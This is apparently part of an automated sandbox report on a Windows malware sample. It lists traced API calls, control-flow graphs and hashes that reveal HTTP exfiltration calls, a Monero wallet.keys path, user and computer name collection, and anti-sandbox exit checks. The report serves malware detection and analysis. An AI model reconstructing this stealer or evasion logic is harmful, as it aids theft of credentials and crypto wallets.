                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001B0DDE,00000000,?,?,00000000,?,",00000000,?,00E2EBA0), ref: 00194E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00194E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00194E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00194E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00194EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00194F15
                                    • HttpOpenRequestA.WININET(00000000,00E2EA50,?,00E2E2C0,00000000,00000000,00400100,00000000), ref: 00194B65
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00194F1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------$0$P
                                    • API String ID: 460715078-2327827448
                                    • Opcode ID: 8d4c836782807b71437d2e05b957c63636b23fb0ee16c8af954e475f8a3a4312
                                    • Instruction ID: 7a240daa7a7a93ce1810a99d25f5ca2a69ee3a94b17c5e8ff7484e65a49d7f23
                                    • Opcode Fuzzy Hash: 8d4c836782807b71437d2e05b957c63636b23fb0ee16c8af954e475f8a3a4312
                                    • Instruction Fuzzy Hash: F612FE76910218ABDB55EB90DD62FEEB379AF25300F904199F10662091EF707F48CF66
                                    Function 001A5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 1a5760-1a57c7 call 1a5d20 call 1aab30 * 3 call 1aaa50 * 4 1106 1a57cc-1a57d3 1090->1106 1107 1a5827-1a589c call 1aaa50 * 2 call 191590 call 1a5510 call 1aabb0 call 1aab10 call 1aade0 StrCmpCA 1106->1107 1108 1a57d5-1a5806 call 1aab30 call 1aaab0 call 191590 call 1a5440 1106->1108 1134 1a58e3-1a58f9 call 1aade0 StrCmpCA 1107->1134 1138 1a589e-1a58de call 1aaab0 call 191590 call 1a5440 call 1aabb0 call 1aab10 1107->1138 1124 1a580b-1a5822 call 1aabb0 call 1aab10 1108->1124 1124->1134 1139 1a58ff-1a5906 1134->1139 1140 1a5a2c-1a5a94 call 1aabb0 call 1aab30 * 2 call 1916b0 call 1aab10 * 4 call 191670 call 191550 1134->1140 1138->1134 1143 1a5a2a-1a5aaf call 1aade0 StrCmpCA 1139->1143 1144 1a590c-1a5913 1139->1144 1270 1a5d13-1a5d16 1140->1270 1163 1a5be1-1a5c49 call 1aabb0 call 1aab30 * 2 call 1916b0 call 1aab10 * 4 call 191670 call 191550 1143->1163 1164 1a5ab5-1a5abc 1143->1164 1149 1a596e-1a59e3 call 1aaa50 * 2 call 191590 call 1a5510 call 1aabb0 call 1aab10 call 1aade0 StrCmpCA 1144->1149 1150 1a5915-1a5969 call 1aab30 call 1aaab0 call 191590 call 1a5440 call 1aabb0 call 1aab10 1144->1150 1149->1143 1250 1a59e5-1a5a25 call 1aaab0 call 191590 call 1a5440 call 1aabb0 call 1aab10 1149->1250 1150->1143 1163->1270 1171 1a5bdf-1a5c64 call 1aade0 StrCmpCA 1164->1171 1172 1a5ac2-1a5ac9 1164->1172 1201 1a5c78-1a5ce1 call 1aabb0 call 1aab30 * 2 call 1916b0 call 1aab10 * 4 call 191670 call 191550 1171->1201 1202 1a5c66-1a5c71 Sleep 1171->1202 1179 1a5acb-1a5b1e call 1aab30 call 1aaab0 call 191590 call 1a5440 call 1aabb0 call 1aab10 1172->1179 1180 1a5b23-1a5b98 call 1aaa50 * 2 call 191590 call 1a5510 call 1aabb0 call 1aab10 call 1aade0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 1a5b9a-1a5bda call 1aaab0 call 191590 call 1a5440 call 1aabb0 call 1aab10 1180->1275 1201->1270 1202->1106 1250->1143 1275->1171
                                    APIs
                                      • Part of subcall function 001AAB30: lstrlen.KERNEL32(00194F55,?,?,00194F55,001B0DDF), ref: 001AAB3B
                                      • Part of subcall function 001AAB30: lstrcpy.KERNEL32(001B0DDF,00000000), ref: 001AAB95
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A5894
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A58F1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A5AA7
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 001A5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A5478
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A5568
                                      • Part of subcall function 001A5510: lstrlen.KERNEL32(00000000), ref: 001A557F
                                      • Part of subcall function 001A5510: StrStrA.SHLWAPI(00000000,00000000), ref: 001A55B4
                                      • Part of subcall function 001A5510: lstrlen.KERNEL32(00000000), ref: 001A55D3
                                      • Part of subcall function 001A5510: lstrlen.KERNEL32(00000000), ref: 001A55FE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A59DB
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A5B90
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001A5C5C
                                    • Sleep.KERNEL32(0000EA60), ref: 001A5C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: dfc792306acfb941e79d97ed67caeed6f2f31216b61845bcd99c1851d0ac8162
                                    • Instruction ID: dfad504ccc803ad18b5e515fbc217aa4829c4966416f28eed8881d1eb54d26f9
                                    • Opcode Fuzzy Hash: dfc792306acfb941e79d97ed67caeed6f2f31216b61845bcd99c1851d0ac8162
                                    • Instruction Fuzzy Hash: C6E12575A10104ABCB58FBB0DD62DED777EAF66300F808568F50667091EF746B48CBA2
                                    Function 001A19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 1a19f0-1a1a1d call 1aade0 StrCmpCA 1304 1a1a1f-1a1a21 ExitProcess 1301->1304 1305 1a1a27-1a1a41 call 1aade0 1301->1305 1309 1a1a44-1a1a48 1305->1309 1310 1a1a4e-1a1a61 1309->1310 1311 1a1c12-1a1c1d call 1aab10 1309->1311 1313 1a1bee-1a1c0d 1310->1313 1314 1a1a67-1a1a6a 1310->1314 1313->1309 1316 1a1a99-1a1aa8 call 1aab30 1314->1316 1317 1a1b1f-1a1b30 StrCmpCA 1314->1317 1318 1a1bdf-1a1be9 call 1aab30 1314->1318 1319 1a1afd-1a1b0e StrCmpCA 1314->1319 1320 1a1a71-1a1a80 call 1aab30 1314->1320 1321 1a1acf-1a1ae0 StrCmpCA 1314->1321 1322 1a1aad-1a1abe StrCmpCA 1314->1322 1323 1a1b82-1a1b93 StrCmpCA 1314->1323 1324 1a1b63-1a1b74 StrCmpCA 1314->1324 1325 1a1bc0-1a1bd1 StrCmpCA 1314->1325 1326 1a1b41-1a1b52 StrCmpCA 1314->1326 1327 1a1ba1-1a1bb2 StrCmpCA 1314->1327 1328 1a1a85-1a1a94 call 1aab30 1314->1328 1316->1313 1341 1a1b3c 1317->1341 1342 1a1b32-1a1b35 1317->1342 1318->1313 1339 1a1b1a 1319->1339 1340 1a1b10-1a1b13 1319->1340 1320->1313 1337 1a1aee-1a1af1 1321->1337 1338 1a1ae2-1a1aec 1321->1338 1335 1a1aca 1322->1335 1336 1a1ac0-1a1ac3 1322->1336 1347 1a1b9f 1323->1347 1348 1a1b95-1a1b98 1323->1348 1345 1a1b80 1324->1345 1346 1a1b76-1a1b79 1324->1346 1329 1a1bdd 1325->1329 1330 1a1bd3-1a1bd6 1325->1330 1343 1a1b5e 1326->1343 1344 1a1b54-1a1b57 1326->1344 1349 1a1bbe 1327->1349 1350 1a1bb4-1a1bb7 1327->1350 1328->1313 1329->1313 1330->1329 1335->1313 1336->1335 1354 1a1af8 1337->1354 1338->1354 1339->1313 1340->1339 1341->1313 1342->1341 1343->1313 1344->1343 1345->1313 1346->1345 1347->1313 1348->1347 1349->1313 1350->1349 1354->1313
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 001A1A15
                                    • ExitProcess.KERNEL32 ref: 001A1A21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 769e7cdc8246f3e01483c8c256fcbaa8a38087df3e028c4dc47718a1cefe6a06
                                    • Instruction ID: afbd6198574a991b70e59e38f2fcb943446ad2ff775d26680ba527c0de9cd7df
                                    • Opcode Fuzzy Hash: 769e7cdc8246f3e01483c8c256fcbaa8a38087df3e028c4dc47718a1cefe6a06
                                    • Instruction Fuzzy Hash: 66510EB8B04209EFCB14DFE4D955AEE77B9EF45704F104498F802AB290E774E941CB62
                                    Function 001A6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20DD0), ref: 001A9BF1
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20F50), ref: 001A9C0A
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20E00), ref: 001A9C22
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20C68), ref: 001A9C3A
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20C98), ref: 001A9C53
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E29290), ref: 001A9C6B
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E14F40), ref: 001A9C83
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E14F60), ref: 001A9C9C
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20CC8), ref: 001A9CB4
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20CE0), ref: 001A9CCC
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20E30), ref: 001A9CE5
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20E60), ref: 001A9CFD
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E15120), ref: 001A9D15
                                      • Part of subcall function 001A9BB0: GetProcAddress.KERNEL32(75900000,00E20E48), ref: 001A9D2E
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001911D0: ExitProcess.KERNEL32 ref: 00191211
                                      • Part of subcall function 00191160: GetSystemInfo.KERNEL32(?), ref: 0019116A
                                      • Part of subcall function 00191160: ExitProcess.KERNEL32 ref: 0019117E
                                      • Part of subcall function 00191110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0019112B
                                      • Part of subcall function 00191110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00191132
                                      • Part of subcall function 00191110: ExitProcess.KERNEL32 ref: 00191143
                                      • Part of subcall function 00191220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0019123E
                                      • Part of subcall function 00191220: ExitProcess.KERNEL32 ref: 00191294
                                      • Part of subcall function 001A6A10: GetUserDefaultLangID.KERNEL32 ref: 001A6A14
                                      • Part of subcall function 00191190: ExitProcess.KERNEL32 ref: 001911C6
                                      • Part of subcall function 001A79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001911B7), ref: 001A7A10
                                      • Part of subcall function 001A79E0: RtlAllocateHeap.NTDLL(00000000), ref: 001A7A17
                                      • Part of subcall function 001A79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001A7A2F
                                      • Part of subcall function 001A7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7AA0
                                      • Part of subcall function 001A7A70: RtlAllocateHeap.NTDLL(00000000), ref: 001A7AA7
                                      • Part of subcall function 001A7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 001A7ABF
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E29110,?,001B10F4,?,00000000,?,001B10F8,?,00000000,001B0AF3), ref: 001A6D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001A6D88
                                    • CloseHandle.KERNEL32(00000000), ref: 001A6D99
                                    • Sleep.KERNEL32(00001770), ref: 001A6DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,00E29110,?,001B10F4,?,00000000,?,001B10F8,?,00000000,001B0AF3), ref: 001A6DBA
                                    • ExitProcess.KERNEL32 ref: 001A6DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2931873225-0
                                    • Opcode ID: 6c9d2426087bde9e2b2afc12aee940a2d2d605d97e839db03acc7914ce9a9b0c
                                    • Instruction ID: 33fabfa15b199c48dea8bad27f6273cc099b874c58a6045f99707c86a5e3fcb2
                                    • Opcode Fuzzy Hash: 6c9d2426087bde9e2b2afc12aee940a2d2d605d97e839db03acc7914ce9a9b0c
                                    • Instruction Fuzzy Hash: B0316F78A44204BBDB44FBF0DC67BFE7379AF26340F540929F112A2192EF706A04C666
                                    Function 001A6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 1a6d93 1437 1a6daa 1436->1437 1439 1a6d5a-1a6d77 call 1aade0 OpenEventA 1437->1439 1440 1a6dac-1a6dc2 call 1a6bc0 call 1a5d60 CloseHandle ExitProcess 1437->1440 1446 1a6d79-1a6d91 call 1aade0 CreateEventA 1439->1446 1447 1a6d95-1a6da4 CloseHandle Sleep 1439->1447 1446->1440 1447->1437
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E29110,?,001B10F4,?,00000000,?,001B10F8,?,00000000,001B0AF3), ref: 001A6D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001A6D88
                                    • CloseHandle.KERNEL32(00000000), ref: 001A6D99
                                    • Sleep.KERNEL32(00001770), ref: 001A6DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,00E29110,?,001B10F4,?,00000000,?,001B10F8,?,00000000,001B0AF3), ref: 001A6DBA
                                    • ExitProcess.KERNEL32 ref: 001A6DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: f95cd8bf548ac35a5115bd5492419dd645d5bf33b99ef6cc8622125bc0f47d74
                                    • Instruction ID: 5190be703f406d199a2b1f6f4be0088b723af960335d0710baccf15f974ec5ab
                                    • Opcode Fuzzy Hash: f95cd8bf548ac35a5115bd5492419dd645d5bf33b99ef6cc8622125bc0f47d74
                                    • Instruction Fuzzy Hash: 8DF08278B48209AFEB54BBE0DC0ABBD3374AF26745F180525F652A51D0DBF05500CA66
                                    Function 00194800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00194889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00194899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 6004e8783291a3f48904fe178f2125ff6f30622a6d2bd9e2ab5a4c060bc80cd5
                                    • Instruction ID: 6658f195247a47ea80f7b629d43c12162d0d0146e8070ced76620002d5dccf79
                                    • Opcode Fuzzy Hash: 6004e8783291a3f48904fe178f2125ff6f30622a6d2bd9e2ab5a4c060bc80cd5
                                    • Instruction Fuzzy Hash: BD213EB1D00209ABDF14DFA5EC46ADE7B74BF45320F508625F915A7290EB706A0ACB91
                                    Function 001A5440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 001962D0: InternetOpenA.WININET(001B0DFF,00000001,00000000,00000000,00000000), ref: 00196331
                                      • Part of subcall function 001962D0: StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 00196353
                                      • Part of subcall function 001962D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00196385
